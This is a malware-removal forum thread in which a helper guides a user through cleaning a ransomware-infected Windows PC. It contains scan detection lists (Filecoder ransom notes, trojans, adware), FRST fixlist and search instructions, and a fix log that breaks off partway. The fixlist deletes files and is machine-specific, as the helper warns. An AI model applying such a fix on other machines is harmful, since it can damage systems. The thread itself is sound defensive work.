C:\FRST\Quarantine\C\Users\Dorothy01\AppData\Local\DECRYPT_INSTRUCTION.HTML.xBAD Win32/Filecoder.CR trojan
C:\FRST\Quarantine\C\Users\Dorothy01\AppData\Local\DECRYPT_INSTRUCTION.TXT.xBAD Win32/Filecoder.CR trojan
C:\FRST\Quarantine\C\Users\Dorothy01\AppData\Local\pckunie.dll.xBAD a variant of Win32/TrojanProxy.Agent.NYT trojan
C:\FRST\Quarantine\C\Users\Dorothy01\AppData\Local\pgkunge.dll.xBAD a variant of Win32/TrojanProxy.Agent.NYT trojan
C:\FRST\Quarantine\C\Users\Dorothy01\AppData\Local\Temp\getmhost.exe.xBAD a variant of Win32/Kryptik.CZFP trojan
C:\FRST\Quarantine\C\Users\Dorothy01\AppData\Roaming\DECRYPT_INSTRUCTION.HTML.xBAD Win32/Filecoder.CR trojan
C:\FRST\Quarantine\C\Users\Dorothy01\AppData\Roaming\DECRYPT_INSTRUCTION.TXT.xBAD Win32/Filecoder.CR trojan
C:\FRST\Quarantine\C\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.HTML.xBAD Win32/Filecoder.CR trojan
C:\FRST\Quarantine\C\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.TXT.xBAD Win32/Filecoder.CR trojan
C:\FRST\Quarantine\C\Users\Dorothy01\Desktop\HELP_DECRYPT.HTML.xBAD Win32/Filecoder.CR trojan
C:\FRST\Quarantine\C\Users\Dorothy01\Desktop\HELP_DECRYPT.TXT.xBAD Win32/Filecoder.CR trojan
C:\ProgramData\RogueKiller\Quarantine\0094F143FFE16510.reg REG/Agent.AK trojan
C:\ProgramData\RogueKiller\Quarantine\24E53487FEB8DA78.reg REG/Agent.AK trojan
C:\ProgramData\RogueKiller\Quarantine\7C9DEC56C370BF3C.reg REG/Agent.AK trojan
C:\ProgramData\RogueKiller\Quarantine\81438BB61F59B727.reg REG/Agent.AK trojan
C:\ProgramData\RogueKiller\Quarantine\BE8834083A072530.reg REG/Agent.AK trojan
C:\ProgramData\RogueKiller\Quarantine\D30EEB58F2B5284C.reg REG/Agent.AK trojan
C:\System Volume Information\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan
C:\System Volume Information\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan
C:\System Volume Information\EfaData\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan
C:\System Volume Information\EfaData\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan
C:\Users\All Users\RogueKiller\Quarantine\0094F143FFE16510.reg REG/Agent.AK trojan
C:\Users\All Users\RogueKiller\Quarantine\24E53487FEB8DA78.reg REG/Agent.AK trojan
C:\Users\All Users\RogueKiller\Quarantine\7C9DEC56C370BF3C.reg REG/Agent.AK trojan
C:\Users\All Users\RogueKiller\Quarantine\81438BB61F59B727.reg REG/Agent.AK trojan
C:\Users\All Users\RogueKiller\Quarantine\BE8834083A072530.reg REG/Agent.AK trojan
C:\Users\All Users\RogueKiller\Quarantine\D30EEB58F2B5284C.reg REG/Agent.AK trojan
C:\Users\Dorothy01\AppData\Local\AMD\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\AMD\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\AMD\Fuel\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\AMD\Fuel\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Apple Computer\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Apple Computer\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Apple Computer\iTunes\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Apple Computer\iTunes\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Apple Computer\iTunes\iAd\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Apple Computer\iTunes\iAd\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Macromedia\Flash Player\FlashPlayerUpdateService.exe Win32/Agent.WSE trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\CLR_v4.0\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\CLR_v4.0\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\CLR_v4.0_32\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\CLR_v4.0_32\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\Internet Explorer\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\Internet Explorer\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\LDE4QFIB\6F2HFX6I.htm Win32/Injector.BUXY trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\LDE4QFIB\F80C8YK2.htm a variant of Win32/Kryptik.CZER trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\LDE4QFIB\ILESJKL3.htm a variant of Win32/Kryptik.CZER trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\LDE4QFIB\K0KQ6VJD.htm Win32/Redyms.AL trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\PI91BGI7\N6C9B6FT.htm a variant of Win32/Injector.BVFY trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\PI91BGI7\PICRTI7N.htm Win32/Redyms.AM trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\PI91BGI7\TE1HBMFT.htm a variant of Win32/Kryptik.CZNJ trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\SISCQQIZ\G8HIT1UX.htm a variant of Win32/Kryptik.CZFP trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\SISCQQIZ\MGN8REVU.htm a variant of Win32/Kryptik.CZJX trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\SISCQQIZ\R1QO5JP1.htm a variant of Win32/Kryptik.CZJX trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\SISCQQIZ\YISNRMU8.htm Win32/Simda.B trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows Mail\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows Mail\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows Mail\Stationery\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows Mail\Stationery\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Temp\D163.tmp Win32/Redyms.AM trojan
C:\Users\Dorothy01\AppData\Local\Temp\~009CE97E.tmp a variant of Win32/Kryptik.CZEF trojan
C:\Users\Dorothy01\AppData\Local\Temp\41c\AppData\Local\Microsoft\Windows\INetCache\IE\1C1SW3MG\82123fbcab77830f3af0dcbe5208a3d5[1].htm JS/Exploit.Agent.NIX trojan
C:\Users\Dorothy01\AppData\Local\Temp\c4\AppData\Local\Microsoft\Windows\INetCache\IE\C7ZS5GJ0\a780b2c52f7951abae3fde16fd81989d[1].htm JS/Exploit.Agent.NIX trojan
C:\Users\Dorothy01\AppData\Local\tmp11238\dag1631.exe a variant of Win32/AdWare.PennyBee.A application
C:\Users\Dorothy01\AppData\Local\tmp11238\dag1631tmp.exe a variant of Win32/AdWare.PennyBee.A application
C:\Users\Dorothy01\AppData\LocalLow\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\LocalLow\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\LocalLow\Sun\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\LocalLow\Sun\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\SystemCache\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\SystemCache\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\SystemCache\6.0\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\SystemCache\6.0\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\SystemCache\6.0\32\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\SystemCache\6.0\32\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Roaming\Adobe\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Roaming\Adobe\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Roaming\Adobe\Flash Player\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Roaming\Adobe\Flash Player\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Roaming\Adobe\Flash Player\AssetCache\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Roaming\Adobe\Flash Player\AssetCache\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Roaming\Adobe\Flash Player\AssetCache\BAZ5TK72\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Roaming\Adobe\Flash Player\AssetCache\BAZ5TK72\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Connected Remote\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Connected Remote\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Connected Remote\data\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Connected Remote\data\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Setup\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Setup\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Setup\Metrics\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Setup\Metrics\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\Music\iTunes\iTunes Media\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\Music\iTunes\iTunes Media\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\Unknown Artist\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\Unknown Artist\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\Unknown Artist\Unknown Album\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\Unknown Artist\Unknown Album\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Public\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Public\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Public\CyberLink\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Public\CyberLink\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Windows\Installer\dfb9a6.msi a variant of Win32/Bundled.Toolbar.Ask potentially unsafe application
C:\Windows.old\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Windows.old\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Windows.old\Users\All Users\RogueKiller\Quarantine\0094F143FFE16510.reg REG/Agent.AK trojan
C:\Windows.old\Users\All Users\RogueKiller\Quarantine\24E53487FEB8DA78.reg REG/Agent.AK trojan
C:\Windows.old\Users\All Users\RogueKiller\Quarantine\7C9DEC56C370BF3C.reg REG/Agent.AK trojan
C:\Windows.old\Users\All Users\RogueKiller\Quarantine\81438BB61F59B727.reg REG/Agent.AK trojan
C:\Windows.old\Users\All Users\RogueKiller\Quarantine\BE8834083A072530.reg REG/Agent.AK trojan
C:\Windows.old\Users\All Users\RogueKiller\Quarantine\D30EEB58F2B5284C.reg REG/Agent.AK trojan

  • 0



#11
dbreeze

dbreeze

    Trusted Helper

  • Malware Removal
  • 2,213 posts

Still a lot of clean up to do ...

 

First, run this FRST Fixlist script >>>>

 

Download the attached fixlist.txt file and save it to the Desktop.

NOTE. It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.

Run FRST64 by right clicking on the FRST64.exe file, selecting "Run as Administrator..".  The User Account Control may open up; if it does, select Yes to continue to let FRST open and load.  

The tool will check for an updated version of itself every time it loads; please allow it to do this and the program will either inform you it is downloading an updated copy (and to wait until it is safe to continue) or show nothing (meaning there is no update found) and you can continue on.  Press the Fix button just once and wait.  The tool will create a restore point, process the script and ask for a restart of your system.


If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.

When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.

 

 

 

Second, let's run a Search with FRST....

 

Start FRST64 by right clicking on it and selecting "Run as Administrator"

 

Once it opens, copy the following text into the Search box.

 

 

HELP_DECRYPT.*;DECRYPT_INSTRUCTION.*

 

 

 

Click the Search Files button and wait.  FRST will display a progress bar and messages and when finished, produce a Search.txt log file.  Please attach that file to a reply post here (it will most likely be too large to paste the text in a reply).

 

 

Attached Files


  • 0

#12
allforhimblog

allforhimblog

    Member

  • Topic Starter
  • Member
  • PipPip
  • 98 posts

Attached is the search log and pasted here is the fix log, thanks again!!

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 25-02-2015 01
Ran by Dorothy01 at 2015-02-26 20:54:30 Run:2
Running from C:\Users\Dorothy01\Desktop
Loaded Profiles: Dorothy01 (Available profiles: Dorothy01)
Boot Mode: Normal
==============================================
 
Content of fixlist:
*****************
start
CreateRestorePoint:
CloseProcesses:
C:\System Volume Information\HELP_DECRYPT.HTML
C:\System Volume Information\HELP_DECRYPT.TXT
C:\System Volume Information\EfaData\HELP_DECRYPT.HTML
C:\System Volume Information\EfaData\HELP_DECRYPT.TXT
C:\Users\Dorothy01\AppData\Local\AMD\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Local\AMD\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Local\AMD\Fuel\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Local\AMD\Fuel\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Local\Apple Computer\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Local\Apple Computer\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Local\Apple Computer\iTunes\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Local\Apple Computer\iTunes\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Local\Apple Computer\iTunes\iAd\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Local\Apple Computer\iTunes\iAd\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Local\Macromedia\Flash Player\FlashPlayerUpdateService.exe Win32/Agent.WSE trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Local\Microsoft\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Local\Microsoft\CLR_v4.0\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Local\Microsoft\CLR_v4.0\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Local\Microsoft\CLR_v4.0_32\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Local\Microsoft\CLR_v4.0_32\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Local\Microsoft\Internet Explorer\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Local\Microsoft\Internet Explorer\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\LDE4QFIB\6F2HFX6I.htm 
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\LDE4QFIB\F80C8YK2.htm
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\LDE4QFIB\ILESJKL3.htm 
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\LDE4QFIB\K0KQ6VJD.htm 
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\PI91BGI7\N6C9B6FT.htm 
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\PI91BGI7\PICRTI7N.htm 
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\PI91BGI7\TE1HBMFT.htm 
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\SISCQQIZ\G8HIT1UX.htm 
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\SISCQQIZ\MGN8REVU.htm 
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\SISCQQIZ\R1QO5JP1.htm 
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\SISCQQIZ\YISNRMU8.htm 
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows Mail\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows Mail\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows Mail\Stationery\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows Mail\Stationery\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Local\Temp\D163.tmp 
C:\Users\Dorothy01\AppData\Local\Temp\~009CE97E.tmp 
C:\Users\Dorothy01\AppData\Local\Temp\41c\AppData\Local\Microsoft\Windows\INetCache\IE\1C1SW3MG\82123fbcab77830f3af0dcbe5208a3d5[1].htm 
C:\Users\Dorothy01\AppData\Local\Temp\c4\AppData\Local\Microsoft\Windows\INetCache\IE\C7ZS5GJ0\a780b2c52f7951abae3fde16fd81989d[1].htm 
C:\Users\Dorothy01\AppData\Local\tmp11238\dag1631.exe
C:\Users\Dorothy01\AppData\Local\tmp11238\dag1631tmp.exe
C:\Users\Dorothy01\AppData\LocalLow\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\LocalLow\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\LocalLow\Sun\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\LocalLow\Sun\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\SystemCache\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\SystemCache\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\SystemCache\6.0\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\SystemCache\6.0\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\SystemCache\6.0\32\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\SystemCache\6.0\32\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Roaming\Adobe\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Roaming\Adobe\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Roaming\Adobe\Flash Player\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Roaming\Adobe\Flash Player\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Roaming\Adobe\Flash Player\AssetCache\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Roaming\Adobe\Flash Player\AssetCache\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Roaming\Adobe\Flash Player\AssetCache\BAZ5TK72\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Roaming\Adobe\Flash Player\AssetCache\BAZ5TK72\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Connected Remote\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Connected Remote\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Connected Remote\data\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Connected Remote\data\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Setup\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Setup\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Setup\Metrics\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Setup\Metrics\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\Music\iTunes\iTunes Media\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\Music\iTunes\iTunes Media\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\Unknown Artist\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\Unknown Artist\DECRYPT_INSTRUCTION.TXT 
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\Unknown Artist\Unknown Album\DECRYPT_INSTRUCTION.HTML 
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\Unknown Artist\Unknown Album\DECRYPT_INSTRUCTION.TXT 
C:\Users\Public\DECRYPT_INSTRUCTION.HTML 
C:\Users\Public\DECRYPT_INSTRUCTION.TXT 
C:\Users\Public\CyberLink\DECRYPT_INSTRUCTION.HTML 
C:\Users\Public\CyberLink\DECRYPT_INSTRUCTION.TXT 
C:\Windows\Installer\dfb9a6.msi
C:\Windows.old\DECRYPT_INSTRUCTION.HTML 
C:\Windows.old\DECRYPT_INSTRUCTION.TXT 
C:\Windows.old\Users\All Users\RogueKiller\Quarantine\0094F143FFE16510.reg 
C:\Windows.old\Users\All Users\RogueKiller\Quarantine\24E53487FEB8DA78.reg 
C:\Windows.old\Users\All Users\RogueKiller\Quarantine\7C9DEC56C370BF3C.reg 
C:\Windows.old\Users\All Users\RogueKiller\Quarantine\81438BB61F59B727.reg 
C:\Windows.old\Users\All Users\RogueKiller\Quarantine\BE8834083A072530.reg 
C:\Windows.old\Users\All Users\RogueKiller\Quarantine\D30EEB58F2B5284C.reg 
Reboot:
end
 
 
 
*****************
 
Restore point was successfully created.
Processes closed successfully.
C:\System Volume Information\HELP_DECRYPT.HTML => Moved successfully.
C:\System Volume Information\HELP_DECRYPT.TXT => Moved successfully.
C:\System Volume Information\EfaData\HELP_DECRYPT.HTML => Moved successfully.
C:\System Volume Information\EfaData\HELP_DECRYPT.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Local\AMD\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Local\AMD\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Local\AMD\Fuel\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Local\AMD\Fuel\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Apple Computer\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Apple Computer\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Apple Computer\iTunes\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Apple Computer\iTunes\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Apple Computer\iTunes\iAd\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Apple Computer\iTunes\iAd\DECRYPT_INSTRUCTION.TXT => Moved successfully.
"C:\Users\Dorothy01\AppData\Local\Macromedia\Flash Player\FlashPlayerUpdateService.exe Win32/Agent.WSE trojan" => File/Directory not found.
C:\Users\Dorothy01\AppData\Local\Microsoft\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\CLR_v4.0\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Microsoft\CLR_v4.0\DECRYPT_INSTRUCTION.TXT => Moved successfully.
